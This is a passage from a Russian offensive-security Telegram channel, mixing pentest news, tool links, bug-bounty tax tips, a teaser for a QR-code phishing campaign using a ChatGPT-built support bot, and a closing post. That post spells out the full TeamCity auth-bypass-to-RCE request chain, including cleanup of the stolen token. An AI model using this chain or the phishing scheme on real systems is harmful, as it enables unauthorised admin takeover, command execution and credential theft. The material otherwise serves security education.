Похек
16.6K subscribers
2.09K photos
110 videos
243 files
3.07K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
IDOR - как предсказать идентификатор

Привет! При тестировании веб приложений, в попытках найти IDOR, ты наверное замечал что существуют разные ID
Так вот, в данном видео рассказывается как предсказывать идентификаторы а также разбираются отчеты с bug bounty где рассказывается как баг хантеры смогли предсказать ID и получить IDOR
Happy hacking 😉

📶 IDOR - how to predict an identifier

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
👍42
Forwarded from PAINtest (Andrey)
А вот и записи и слайды докладов с VolgaCTF 2023 подъехали :)

https://www.youtube.com/playlist?list=PLn9UM_ZLJ6PBx5fsRS5AKZDjJZ7znC5yp

http://archive.volgactf.ru/#volgactf_2023/slides/
43🔥3
На конференции Yandex Scale представили новый сервис для защиты приложений от DDos-атак. Называется Smart Web Security. В чем фишка?

👍Это нативный сервис Яндекса, он защищает все приложения как родные.
Включить/выключить одним кликом.
Везде одинаковые настройки, не нужно менять ip адреса.
🙅‍♂️Не нужно отправлять партнеру tls-сертификат.
Можно пользоваться облачными инструментами сбора логов.
Интеграция с капчей (в России такое есть еще только у гугла).
🧠Обучение ML-алгоритмов происходит на реальном трафике: они умнеют у вас на глазах.

А еще сервис отлично отражает DDoS-атаки уровня L7, которые имитируют поведение пользователей.
🔥10👍3🌚3🐳1
Первый доклад стартовал
🥰8❤‍🔥53
🔴 WebSocket. Краткий экскурс в пентест ping-pong протокола
#websocket

"Краткость - сестра таланта" - именно так сказал Антон Павлович Чехов, и теперь говорю я. Сегодня, завтра и до конца дней площадки речь пойдет о WebSocket-ах: "Что это?", "Как работает?" и главное - "Как это взламывать?" (в целях этичного хакинга конечно). Начнем с простого и будем идти к более сложному, пробираясь через тернии к звёздам. Приятного чтения.

💬 Канал | 📡 Статья на Habr
Please open Telegram to view this post
VIEW IN TELEGRAM
👍161
Forwarded from sdnv's funk-hole
Пентестеры в СНГ часто сталкиваются с 1С-серверами внутри инфраструктур, один из векторов атак - Консоль Администрирования Кластеров 1С (RAS).
Чтобы попытаться подключиться к нему - подбирают версию клиента коноли аналогичную серверу, скачивают нужный серверный дистрибутив под винду и только тогда смогут зайти под имеющимися/пустыми кредами получая кучу полезной информации.

Я автоматизировал этот процесс благодаря консольной утилите rac от 1С для Linux. Более того, больше не нужно подбирать версию клиента и сервера - утилита rac работает с разными версиями серверов.

Этапы: Скан nmap с поиском открытых портов RAS, Сбор информации при успешном подключении к серверу, Выгрузка полученной информации в .csv под каждый сервер. Более подробно в README

https://github.com/sdnv0x4d/rasoff
🔥82👍1
DDoS-защиту Cloudflare можно обойти с помощью самой Cloudflare
#xakep #cloudflare

Исследователи из компании Certitude обнаружили, что брандмауэр Cloudflare, а также защиту от DDoS-атак можно обойти, атаковав других пользователей изнутри самой платформы. Проблема возникает из-за общей инфраструктуры, к которой имеют доступ все арендаторы (tenant), что позволяет злоумышленникам атаковать клиентов Cloudflare через Cloudflare.

💬 Канал | 📡 Хакер | ➡️Более подробная информация
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚13🔥5👾3👍1
Forwarded from Кавычка (Bo0oM)
Снова про #1С

Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.".
Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить на выполнение, открыв ее как любой другой файл, хранящийся на диске."

В правом верхнем углу нажимаем на "бутерброд" -> Файл -> Открыть.

Выбираем наш epf и жмём "ок".
Но только 1С может быть не только под Windows, но и под Linux. Поэтому в коллекцию еще один шелл, который универсальный и под любую операционную систему.

>
❤‍🔥52
Forwarded from Bounty On Coffee
Товарищи багхантеры! Я к вам с хорошими новостями, которые помогут вам сэкономить больше денег с выплат.

Еще в 2020 году, Никита публиковал такую вот хорошие статью: https://habr.com/ru/articles/483082/

Но есть еще нюансы, которые кому-то могут помочь.

Для ИП на УСН для некоторых регионов есть льготы, а именно – это 1% на доход, шикарно же!

В список регионов с таким процентом входят:
- Республика Дагестан
- Мурманская область
- Ненецкая AO

И еще несколько регионов с процентом – 4. Подробная таблица здесь: https://e-kontur.ru/enquiry/276/check_usn

В итоге, если ваши выплаты переваливают за 1 млн рублей и у вас есть возможность оформить ИП в юрисдикции этих регионов, то вперед. Если меньше, то смысла нет, лучше не париться и сидеть на “самозанятом”.

К примеру, если вы получите выплат за 2023 год на 2 млн рублей:
- Самозанятый заплатит – 120к рублей
- ИП на УСН в льготном регионе – фиксированный страховой взнос – 45к, 1% на доход свыше 300к (но тут можно уменьшить это) - 17к и сам налог на доход – 20к = 77к. Чем больше выплат, тем больше экономия.
9
Завтра буду на Mobile Appsec Club ✌🏻

#mobileappsecclub
9🫡6
📣ChatGPT на рыбалке. Выманиваем пароль при помощи QR-кода и чат-бота

ChatGPT сей­час раз­ве что в кот­леты не кла­дут. В этой статье мы рас­ска­жем, как в про­екте по соци­аль­ной инже­нерии с помощью фор­ка биб­лиоте­ки для Gophish рас­сылать QR-коды вмес­то обыч­ных ссы­лок, что­бы вытащить сот­рудни­ков из защищен­ного рабоче­го окру­жения на лич­ные девай­сы. В качес­тве catchy-сце­нария рас­сылки мы рас­смот­рим «Telegram-бот IT-под­дер­жки с ChatGPT» и на самом деле исполь­зуем эту ней­росеть для генера­ции кода бота, а так­же под­клю­чим интегра­цию с API OpenAI для обще­ния с поль­зовате­лями.

#xakep #chatgpt

💬 Канал | 📶 Хакер
Please open Telegram to view this post
VIEW IN TELEGRAM
👍82
135🔥1
Похек
Photo
Стендап по ИБ

#mobileappsecclub
😎21🌚3
Forwarded from Monkey Hacker
Token that gives me power

Наверно кто-то слышал про новую проблему в JetBrains TeamCity, связанная с RPC2

В целом стоит начать, что TeamCity используется для автоматизированной сборки и тестирования ПО. А он написан на Java

Ребята нашли интересный дифф в методе XmlRpcController.getPathSuffix. Точнее был прикол, связанный с wildcard path. Плюс TeamCity использует фреймворк Spring, а там существует интерцептор, который позволяет модифицировать входящие HTTP-запросы (thx to riven). По этим и другим причинам, любой входящий HTTP-запрос, имеющий путь /**/RPC2, не будет подвергаться проверке аутентификации. А значит мы можем использовать API-ручки для получения токенов почти любых пользователей и для дальнейшего создания собственного юзера.

/app/rest/users/<userLocator>/tokens/<tokenName>

Отсюда мы имеем следующий сценарий

Получаем токен администратора

POST /app/rest/users/id:1/tokens/RPC2

С его помощью, мы теперь можем создать пользователя с админскими правами

POST localhost:8111/app/rest/users -H "Content-Type: application/json" --data "{\"username\": \"monkey1\", \"password\": \"monkey\", \"email\": \"monkey\", \"roles\": {\"role\": [{\"roleId\": \"SYSTEM_ADMIN\", \"scope\": \"g\"}]}}" -H "Authorization: Bearer eyJ0eXAiOiAiVENWMiJ9.eWaBWGhGSFBZVHB4WvAxNEptVmhQUkkxN0VF.MjhmYTY2MjUtNjZhNy00OTQ0LTk4LmItYzI1N2Q3MjIwMzE2"

Но, мы можем пойти дальше и докрутить до RCE. Первым делом включаем дебаг (токен здесь также потребуется)

POST /admin/dataDir.html?action=edit&fileName=config/internal.properties&content=rest.debug.processes.enable=true

Не забываем все это применить к текущему конфигу

POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties

И теперь мы имеем возможность исполнять команды

POST /app/rest/debug/processes?exePath=id


Не забываем удалять токен

DELETE /app/rest/users/id:1/tokens/RPC2
👍431🔥1